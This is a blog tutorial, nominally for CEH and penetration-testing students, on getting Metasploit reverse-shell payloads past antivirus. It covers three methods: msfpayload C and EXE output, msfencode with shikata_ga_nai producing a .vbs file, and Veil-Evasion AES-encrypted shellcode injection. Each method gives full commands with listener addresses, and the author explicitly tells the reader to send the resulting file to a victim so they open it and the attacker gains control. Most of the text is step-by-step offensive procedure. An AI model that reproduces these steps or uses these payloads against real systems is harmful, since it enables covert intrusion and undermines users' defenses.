Basic Ways to bypass Antivirus Software(For CEH,Penetration Testing student))

• Hello,My name is Chi Cao Hoang.Today i will introduce to you some basic ways to bypass Antivirus Software.First of all i will tell you the rules again to make sure that everyone of you who read this tutorial today never end up your life in Jail :

So when it comes to ” hacking ” onto our target’s system, the most part where we all fail is evading their anti-virus.

• So in this long tutorial i’ll be teaching you various ways in actually by-passing the Anti-Virus so that you can easily have a meterpreter session running onto your target’s system without the Anti-Virus flagging your software.
• Antivirus software companies generally develop their software to look for a “signature” of viruses and other malware. In most instances, they look at the first few lines of code for a familiar pattern of known malware. When they find malware in the wild, they simply add its signature to their virus/malware database and when it next encounters that malware, the software alerts the computer owner.

Before we get started here are the Prerequisites :

1. Kali Linux

2. A Quick Scanning of Victim’s AV ( Like what AV are they using, etc )

Now lets get started !

METHOD 1 : Changing the Payload into a C Program

So in this method, we are going to exploit the victim’s system, by changing our Metasploit’s Payload into a C Language Payload so that AV wont flag it as suspicious.

STEP 1 : Open up Kali and run msfconsole

STEP 2 : Generate an exploit in C

Now, we are going to generate an exploit in C language.

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C

Notice that i’ve appended the command with a capital ” C ” .

This C tells the console to generate this payload in C Language.
Once we have done that, we would get similar output like this :

STEP 3 : Generating a Binary Code

Finally, we need to generate a binary executable for the shellcode which can use in our client side attack.

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe

We have now created an executable file by using the X option and then sent this file to the current folder and named the file setup.exe.
We can now use this new payload in a client-side attack and the victim’s AV software will be unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.

METHOD 2 : Encoding our Payload

Now, we are going to change our signature by encoding it. So lets get started

STEP 1 : Fire up Kali and run msfconsole

STEP 2 : Using msfencode

Lets run msfencode -l to view the available list of encoders for us to use

Here, we can see a lot of encoders for us to use.

Fourth from the bottom you can see an encoder named ” shikata_ga_nai ” .

Note that it is rated “excellent” and it’s a “Polymorphic XOR Additive Feedback Encoder ” .
So lets use that one.

Whats shikata_ga_nai ?

Firstly, this is a Japanese phrase that translates to “nothing can be done about it.” Great name for an encoder huh ! Secondly, it’s an additive XOR polymorphic encoder . This means that it will change its shape/signature (polymorphic), by using an XOR encrypting scheme. XOR is far from a perfect encryption scheme, but it’s efficient and can generate multiple shapes/signatures quickly that can then be decrypted by the code itself once it arrives at the target.

STEP 3 : Re-coding our Payload with the encoder

Now, let’s use shikata_ga_nai to re-encode our reverse TCP shell to get it past AV software. In MSF we type :

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/cybrary_it.vbs

Here, ” | ” means that, generate a payload with the following extra parameters or rules etc..

msfencode -e x86/shikata_ga_nai -c 20 -t vbs means, re-encode that payload with skikata_ga_nai and run it 20 times (-c 20), and then encode it to look like a .vbs script .

And finally save it in root with file name cybrary_it.vbs

Now when we check our root folder, we find this :

Now, its just a matter of minutes in sending the file to our victim and make him open it, and boom we got their system.

METHOD 3 : Using Veil Evasion

• In this final method ( of this tutorial, i cant post all 50 methods lol ) we are going to evade the AV one last time by using Veil Evasion.
• Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

STEP 1 : Installing Veil – Evasion

First thing we are going to do in install this !

So we type : root@kali > apt-get install veil-evasion

STEP 2 : Opening Veil Evasion

To open our recently installed Veil – Evasion just type :

root@kali > veil-evasion

When we type that, we get this :

Veil will now begin its installation.

It will ask you whether you want to install dependencies ; type ” Y ” for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select “Install for all users” and click the “Next” button. Continue to click “Next” through several screens until you finally come to a window with the “Finish” button. Click it. Eventually,  you will arrive at the screen below. Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.

STEP 3 : Creating an EXE Payload

Let’s now type “list” as this will list all of the payloads that Veil-Evasion can work with.

STEP 4 : Choosing a Payload

in this case, let’s use the ruby/meterpreter/rev_tcp, or number 44.

Let’s type: > use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.

We will need to set LHOST and LPORT.

> set LHOST 192.168.1.101

> set LPORT 4444

Of course, use the appropriate IP address and port for your circumstances.

Next, we need to tell Veil-Evasion to generate the executable.

> generate 

As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named “newpayload.exe” .

STEP 5 : Generating an encrypted Payload to bypass AV

• Next, let’s attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we will use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt.
• This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.
• This is number 32 on our payload list, so type: > info 32 It then returns info on this payload as seen below.

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

• Next, let’s tell Veil-Evasion we want to use this payload :  > use 32

Here we have the option to change the default options if we care to do so. For now, let’s leave the default options as they are.

• Next, let’s tell Veil-Evasion we want to generate this encrypted payload  :> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT.

When we finish entering the appropriate information for our payload, it will begin to generate the shellcode.

This can take few minutes, so be patient. Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple “veilpayload.”

Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

There are a lot of ways you can use to bypass AV. These are the most used method by me and my team. If you are stuck in any method or if you have any suggestions / complains / queries, feel free to message me 

Read more at: hoangcaochi.blogspot.com